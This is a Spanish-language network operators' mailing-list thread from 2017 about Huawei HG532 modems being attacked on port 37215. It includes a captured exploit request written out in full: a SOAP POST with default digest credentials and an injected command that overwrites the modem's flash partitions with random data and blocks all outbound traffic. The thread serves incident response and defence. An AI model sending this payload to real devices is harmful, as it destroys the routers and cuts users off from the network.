[Lista ArNOG] Problemas Modem Huawei HG532s
Diego Weinstein
diegow en netlabs.com.ar
Mie Dic 6 19:09:47 ART 2017
Efectivamente puerto 37215
POST /ctrlt/DeviceUpgrade_1 HTTP/1.1
Host: xx.xx.xx.xx:37215
Content-Length: 601
Connection: keep-alive
Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway",
nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1",
response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth",
nc=00000001, cnonce="248d1a2560100669"
<?xml version="1.0" ?><s:Envelope
xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"
s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgra
de
xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/b
in/busybox cat /dev/urandom >/dev/mtdblock0;/bin/busybox cat /dev/urandom
>/dev/mtdblock3;/bin/busybox cat /dev/urandom >/dev/mtdblock1;/bin/busybox
cat /dev/urandom >/dev/mtdblock2;/bin/busybox cat /dev/urandom
>/dev/mtdblock4;/bin/iptables -A OUTPUT -j
DROP)</NewStatusURL><NewDownloadURL>$(echo
HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Beautiful
Netlabs IT Solutions ©
Diego Weinstein | Research & Development
diegow en netlabs.com.ar | Tel: +54 (11) 5199-2266 int 11
| www.netlabs.com.ar
-----Mensaje original-----
De: lista-bounces en arnog.com.ar [mailto:lista-bounces en arnog.com.ar] En nombre
de Fernando Gont
Enviado el: miércoles, 06 de diciembre de 2017 15:57
Para: lista en arnog.com.ar; Esteban Refort
Asunto: Re: [Lista ArNOG] Problemas Modem Huawei HG532s
On 12/06/2017 10:40 AM, Esteban Refort wrote:
> Buenas del soporte me informaron que el origen del problema es el
> puerto 37215.
>
> Adjunto lo que me paso :
>
> Los bloqueos que se hacían hace dos semanas bloqueaba solo los ataque
> no el origen de la infección del virus. Sobre este puerto se hace un
> put al xml del modem y se inyecta el virus. Hagan bloqueo de ese
> puerto. Es un bug de huawei reportado en el 2015
> www.redpiranha.net/huawei-routers-vulnerable-directory-traversal-attac
> ks-cve-2015-7254
> <http://www.redpiranha.net/huawei-routers-vulnerable-directory-travers
> al-attacks-cve-2015-7254>
Alguno tiene a mano uno de estos routers para ahcerle un escaneo de puertos?
--
Fernando Gont
SI6 Networks
e-mail: fgont en si6networks.com
PGP Fingerprint: 6666 31C6 D484 63B2 8FB1 E3C4 AE25 0D55 1D4E 7492
_______________________________________________
Lista mailing list
Lista en arnog.com.ar
http://mailmancabase.interdotnet.com.ar/mailman/listinfo/lista
Más información sobre la lista de distribución Lista